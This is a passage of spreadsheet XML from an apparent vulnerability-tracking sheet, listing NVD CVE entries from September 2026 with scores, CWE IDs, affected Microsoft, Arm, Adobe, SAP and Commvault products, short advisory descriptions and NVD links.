      <c r="Q611" s="5" t="inlineStr"/>
      <c r="R611" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S611" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T611" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73011</t>
        </is>
      </c>
    </row>
    <row r="612">
      <c r="A612" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B612" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C612" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73014</t>
        </is>
      </c>
      <c r="D612" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E612" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F612" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G612" s="5" t="inlineStr"/>
      <c r="H612" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I612" s="5" t="inlineStr"/>
      <c r="J612" s="5" t="inlineStr"/>
      <c r="K612" s="5" t="inlineStr"/>
      <c r="L612" s="5" t="inlineStr"/>
      <c r="M612" s="5" t="inlineStr"/>
      <c r="N612" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O612" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P612" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q612" s="5" t="inlineStr"/>
      <c r="R612" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S612" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Data Sharing Service Client allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T612" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73014</t>
        </is>
      </c>
    </row>
    <row r="613">
      <c r="A613" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B613" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C613" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73015</t>
        </is>
      </c>
      <c r="D613" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E613" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F613" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G613" s="5" t="inlineStr"/>
      <c r="H613" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I613" s="5" t="inlineStr"/>
      <c r="J613" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K61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13" s="5" t="inlineStr"/>
      <c r="M613" s="5" t="inlineStr"/>
      <c r="N613" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O613" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P613" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q613" s="5" t="inlineStr"/>
      <c r="R613" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S613" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T613" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73015</t>
        </is>
      </c>
    </row>
    <row r="614">
      <c r="A614" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B614" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C614" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73020</t>
        </is>
      </c>
      <c r="D614" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E614" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F614" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G614" s="5" t="inlineStr"/>
      <c r="H614" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I614" s="5" t="inlineStr"/>
      <c r="J614" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K61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14" s="5" t="inlineStr"/>
      <c r="M614" s="5" t="inlineStr"/>
      <c r="N614" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O614" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P614" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q614" s="5" t="inlineStr"/>
      <c r="R614" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S614" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T614" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73020</t>
        </is>
      </c>
    </row>
    <row r="615">
      <c r="A615" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B615" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C615" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73021</t>
        </is>
      </c>
      <c r="D615" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E615" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F615" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G615" s="5" t="inlineStr"/>
      <c r="H615" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I615" s="5" t="inlineStr"/>
      <c r="J615" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K61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15" s="5" t="inlineStr"/>
      <c r="M615" s="5" t="inlineStr"/>
      <c r="N615" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O615" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P615" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q615" s="5" t="inlineStr"/>
      <c r="R615" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="S615" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T615" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73021</t>
        </is>
      </c>
    </row>
    <row r="616">
      <c r="A616" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B616" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C616" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73024</t>
        </is>
      </c>
      <c r="D616" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E616" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F616" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G616" s="5" t="inlineStr"/>
      <c r="H616" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I616" s="5" t="inlineStr"/>
      <c r="J616" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K61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16" s="5" t="inlineStr"/>
      <c r="M616" s="5" t="inlineStr"/>
      <c r="N616" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O616" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P616" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q616" s="5" t="inlineStr"/>
      <c r="R616" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S616" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Services for NFS ONCRPC XDR Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T616" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73024</t>
        </is>
      </c>
    </row>
    <row r="617">
      <c r="A617" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B617" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C617" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73026</t>
        </is>
      </c>
      <c r="D617" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E617" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F617" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G617" s="5" t="inlineStr"/>
      <c r="H617" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I617" s="5" t="inlineStr"/>
      <c r="J617" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K61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17" s="5" t="inlineStr"/>
      <c r="M617" s="5" t="inlineStr"/>
      <c r="N617" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O617" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P617" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q617" s="5" t="inlineStr"/>
      <c r="R617" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S617" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T617" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73026</t>
        </is>
      </c>
    </row>
    <row r="618">
      <c r="A618" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B618" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C618" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-7476</t>
        </is>
      </c>
      <c r="D618" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E618" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F618" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G618" s="5" t="inlineStr"/>
      <c r="H618" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I618" s="5" t="inlineStr"/>
      <c r="J618" s="5" t="inlineStr"/>
      <c r="K618" s="5" t="inlineStr"/>
      <c r="L618" s="5" t="inlineStr"/>
      <c r="M618" s="5" t="inlineStr"/>
      <c r="N618" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O618" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P618" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q618" s="5" t="inlineStr"/>
      <c r="R618" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S618" s="5" t="inlineStr">
        <is>
          <t>Use After Free vulnerability in Arm Ltd Bifrost GPU Kernel Driver, Arm Ltd Valhall GPU Kernel Driver, Arm Ltd Arm 5th Gen GPU Architecture Kernel Driver allows a local non-privileged user process to perform improper GPU memory processing operations to access already freed memory.
This issue affects Bifrost GPU Kernel Driver: from r49p3 through r49p5, r51p0, from r54p1 through r54p2; Valhall GPU Kernel Driver: from r49p3 through r49p5, from r51p0 through r54p3, r55p0; Arm 5th Gen GPU Architecture Kernel Driver: from r49p3 through r49p5, from r51p0 through r54p3, r55p0.</t>
        </is>
      </c>
      <c r="T618" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-7476</t>
        </is>
      </c>
    </row>
    <row r="619">
      <c r="A619" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B619" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C619" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-7477</t>
        </is>
      </c>
      <c r="D619" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E619" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F619" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G619" s="5" t="inlineStr"/>
      <c r="H619" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I619" s="5" t="inlineStr"/>
      <c r="J619" s="5" t="inlineStr"/>
      <c r="K619" s="5" t="inlineStr"/>
      <c r="L619" s="5" t="inlineStr"/>
      <c r="M619" s="5" t="inlineStr"/>
      <c r="N619" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O619" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P619" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q619" s="5" t="inlineStr"/>
      <c r="R619" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S619" s="5" t="inlineStr">
        <is>
          <t>Use After Free vulnerability in Arm Ltd Bifrost GPU Kernel Driver, Arm Ltd Valhall GPU Kernel Driver, Arm Ltd Arm 5th Gen GPU Architecture Kernel Driver allows a local non-privileged user process to perform valid GPU memory processing operations to access already freed memory.
This issue affects Bifrost GPU Kernel Driver: from r44p0 through r49p4, from r50p0 through r51p0, from r54p1 through r54p2; Valhall GPU Kernel Driver: from r44p0 through r49p5, from r50p0 through r54p3; Arm 5th Gen GPU Architecture Kernel Driver: from r44p0 through r49p5, from r50p0 through r54p3, r55p0.</t>
        </is>
      </c>
      <c r="T619" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-7477</t>
        </is>
      </c>
    </row>
    <row r="620">
      <c r="A620" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B620" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C620" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75631</t>
        </is>
      </c>
      <c r="D620" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E620" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F620" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G620" s="5" t="inlineStr"/>
      <c r="H620" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I620" s="5" t="inlineStr"/>
      <c r="J620" s="5" t="inlineStr"/>
      <c r="K620" s="5" t="inlineStr">
        <is>
          <t>adobe:photoshop, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L620" s="5" t="inlineStr"/>
      <c r="M620" s="5" t="inlineStr"/>
      <c r="N620" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O620" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P620" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q620" s="5" t="inlineStr"/>
      <c r="R620" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S620" s="5" t="inlineStr">
        <is>
          <t>Photoshop Desktop is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="T620" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75631</t>
        </is>
      </c>
    </row>
    <row r="621">
      <c r="A621" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B621" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C621" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75771</t>
        </is>
      </c>
      <c r="D621" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E621" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F621" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G621" s="5" t="inlineStr"/>
      <c r="H621" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I621" s="5" t="inlineStr"/>
      <c r="J621" s="5" t="inlineStr"/>
      <c r="K621" s="5" t="inlineStr">
        <is>
          <t>adobe:photoshop, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L621" s="5" t="inlineStr"/>
      <c r="M621" s="5" t="inlineStr"/>
      <c r="N621" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O621" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P621" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q621" s="5" t="inlineStr"/>
      <c r="R621" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S621"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T621" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75771</t>
        </is>
      </c>
    </row>
    <row r="622">
      <c r="A622" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B622" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C622" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75862</t>
        </is>
      </c>
      <c r="D622" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E622" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F622" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G622" s="5" t="inlineStr"/>
      <c r="H622" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I622" s="5" t="inlineStr"/>
      <c r="J622" s="5" t="inlineStr"/>
      <c r="K622" s="5" t="inlineStr">
        <is>
          <t>adobe:photoshop, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L622" s="5" t="inlineStr"/>
      <c r="M622" s="5" t="inlineStr"/>
      <c r="N622" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O622" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P622" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q622" s="5" t="inlineStr"/>
      <c r="R622" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S622"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T622" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75862</t>
        </is>
      </c>
    </row>
    <row r="623">
      <c r="A623" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B623" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C623" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75863</t>
        </is>
      </c>
      <c r="D623" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E623" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F623" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G623" s="5" t="inlineStr"/>
      <c r="H623" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I623" s="5" t="inlineStr"/>
      <c r="J623" s="5" t="inlineStr"/>
      <c r="K623" s="5" t="inlineStr">
        <is>
          <t>adobe:photoshop, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L623" s="5" t="inlineStr"/>
      <c r="M623" s="5" t="inlineStr"/>
      <c r="N623" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O623" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P623" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q623" s="5" t="inlineStr"/>
      <c r="R623" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S623"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T623" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75863</t>
        </is>
      </c>
    </row>
    <row r="624">
      <c r="A624" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B624" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C624" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75992</t>
        </is>
      </c>
      <c r="D624" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E624" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F624" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G624" s="5" t="inlineStr"/>
      <c r="H624" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I624" s="5" t="inlineStr"/>
      <c r="J624" s="5" t="inlineStr"/>
      <c r="K624" s="5" t="inlineStr"/>
      <c r="L624" s="5" t="inlineStr"/>
      <c r="M624" s="5" t="inlineStr"/>
      <c r="N624" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O624" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P624" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q624" s="5" t="inlineStr"/>
      <c r="R624" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S624" s="5" t="inlineStr">
        <is>
          <t>Illustrator is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="T624" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75992</t>
        </is>
      </c>
    </row>
    <row r="625">
      <c r="A625" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B625" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C625" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76967</t>
        </is>
      </c>
      <c r="D625" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E625" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F625" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G625" s="5" t="inlineStr"/>
      <c r="H625" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I625" s="5" t="inlineStr"/>
      <c r="J625" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K625" s="5" t="inlineStr"/>
      <c r="L625" s="5" t="inlineStr"/>
      <c r="M625" s="5" t="inlineStr"/>
      <c r="N625" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O625" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P625" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q625" s="5" t="inlineStr"/>
      <c r="R625" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S625" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T625" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76967</t>
        </is>
      </c>
    </row>
    <row r="626">
      <c r="A626" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B626" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C626" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77091</t>
        </is>
      </c>
      <c r="D626" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E626" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F626" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G626" s="5" t="inlineStr"/>
      <c r="H626" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I626" s="5" t="inlineStr"/>
      <c r="J626" s="5" t="inlineStr"/>
      <c r="K626" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault</t>
        </is>
      </c>
      <c r="L626" s="5" t="inlineStr"/>
      <c r="M626" s="5" t="inlineStr"/>
      <c r="N626" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O626" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P626" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q626" s="5" t="inlineStr"/>
      <c r="R626" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S626" s="5" t="inlineStr">
        <is>
          <t>DataCube contained a path traversal issue affecting security feature enforcement. Software customers upgrade to resolved maintenance release. Update Content Extractor and Index Store.</t>
        </is>
      </c>
      <c r="T626" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77091</t>
        </is>
      </c>
    </row>
    <row r="627">
      <c r="A627" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B627" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C627" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77489</t>
        </is>
      </c>
      <c r="D627" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E627" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F627" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G627" s="5" t="inlineStr"/>
      <c r="H627" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I627" s="5" t="inlineStr"/>
      <c r="J627" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K62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27" s="5" t="inlineStr"/>
      <c r="M627" s="5" t="inlineStr"/>
      <c r="N627" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O627" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P627" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q627" s="5" t="inlineStr"/>
      <c r="R627" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="S627" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T627" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77489</t>
        </is>
      </c>
    </row>
    <row r="628">
      <c r="A628" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B628" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C628" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77500</t>
        </is>
      </c>
      <c r="D628" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E628" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F628" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G628" s="5" t="inlineStr"/>
      <c r="H628" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I628" s="5" t="inlineStr"/>
      <c r="J628" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K62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28" s="5" t="inlineStr"/>
      <c r="M628" s="5" t="inlineStr"/>
      <c r="N628" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O628" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P628" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q628" s="5" t="inlineStr"/>
      <c r="R628" s="5" t="inlineStr">
        <is>
          <t>CWE-763</t>
        </is>
      </c>
